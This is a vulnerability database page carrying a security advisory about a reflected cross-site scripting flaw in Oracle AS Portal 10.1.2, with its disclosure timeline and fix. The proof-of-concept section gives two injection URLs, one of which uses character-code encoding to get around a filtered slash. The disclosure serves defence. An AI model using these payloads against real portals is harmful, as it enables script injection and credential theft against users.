Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Oracle AS Portal 10.1.2 Cross Site Scripting

🗓️ 02 May 2011 00:00:00Reported by Vicente Aguilera DiazType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 25 Views

Oracle AS Portal 10.1.2 XSS Vulnerability in Database Access Descripto

Code
`=============================================  
INTERNET SECURITY AUDITORS ALERT 2010-007  
- Original release date: August 11th, 2010  
- Last revised: May 1st, 2011  
- Discovered by: Vicente Aguilera Diaz  
- Severity: 5.0/10 (CVSS Base Scored)  
=============================================  
  
I. VULNERABILITY  
-------------------------  
XSS in Oracle Portal Database Access Descriptor  
  
II. BACKGROUND  
-------------------------  
Oracle AS Portal is a Web-based application for building and deploying  
portals. It provides a secure, manageable environment for accessing  
and interacting with enterprise software services and information  
resources.  
  
III. DESCRIPTION  
-------------------------  
Has been detected a reflected XSS vulnerability in Oracle Application  
Server, that allows the execution of arbitrary HTML/script code to be  
executed in the context of the victim user's browser.  
  
The code injection is done through the DAD name. A DAD (Database  
Access Descriptor) is a set of values that specifies how a database  
server should fulfill a HTTP request.  
  
IV. PROOF OF CONCEPT  
-------------------------  
Original request:  
http://<oracle-application-server>/portal/pls/<DAD>  
  
Malicious request:  
http://<oracle-application-server>/portal/pls/<XSS injection>  
  
Example 1:  
http://<oracle-application-server>/portal/pls/"<H1>XSS vulnerability<XSS  
  
In this scenario, the attacker has the difficulty of being unable to  
close the HTML tag because he's can not add the character "/" as part  
of the code injection (DAD name). However, it is possible to generate  
that character without appearing in the injection. Below is an example.  
  
Example 2:  
http://<oracle-application-server>/portal/pls/"<img src=""  
onmouseover="document.body.innerHTML=String.fromCharCode(60,72,84,77,76,62,60,72,49,62,88,83,83,60,47,72,49,62,32,60,72,50,62,86,85,76,78,60,47,72,50,62);"><XSS  
  
V. BUSINESS IMPACT  
-------------------------  
An attacker can execute arbitrary HTML or script code in a targeted  
user's browser, this can leverage to steal sensitive information as  
user credentials, personal data, etc.  
  
VI. SYSTEMS AFFECTED  
-------------------------  
Tested in Oracle Application Server Portal (Oracle AS Portal) 10g,  
version 10.1.2. Other versions may be affected too.  
  
VII. SOLUTION  
-------------------------  
Install last CPU (Critical Patch Update).  
  
VIII. REFERENCES  
-------------------------  
http://www.oracle.com  
http://www.isecauditors.com  
  
IX. CREDITS  
-------------------------  
This vulnerability has been discovered  
by Vicente Aguilera Diaz (vaguilera (at) isecauditors (dot) com).  
  
X. REVISION HISTORY  
-------------------------  
August 11, 2010: Initial release  
May 01, 2011: Final revision  
  
XI. DISCLOSURE TIMELINE  
-------------------------  
August 11, 2010: Discovered by Internet Security Auditors  
August 11, 2010: Oracle contacted including PoC.  
August 12, 2010: Oracle inform that will investigate  
the vulnerability.  
April 19, 2011: Oracle fixed the vulnerability in the  
CPU (Critical Patch Update).  
May 01, 2011: Sent to lists.  
  
XII. LEGAL NOTICES  
-------------------------  
The information contained within this advisory is supplied "as-is"  
with no warranties or guarantees of fitness of use or otherwise.  
Internet Security Auditors accepts no responsibility for any damage  
caused by the use or misuse of this information.  
  
XIII. ABOUT  
-------------------------  
Internet Security Auditors is a Spain based leader in web application  
testing, network security, penetration testing, security compliance  
implementation and assessing. Our clients include some of the largest  
companies in areas such as finance, telecommunications, insurance,  
ITC, etc. We are vendor independent provider with a deep expertise  
since 2001. Our efforts in R&D include vulnerability research, open  
security project collaboration and whitepapers, presentations and  
security events participation and promotion. For further information  
regarding our security services, contact us.  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
02 May 2011 00:00Current
7.4High risk
Vulners AI Score7.4
cross site scriptingoracle as portaldatabase access descriptorsecurity auditcode executioncritical patch update
25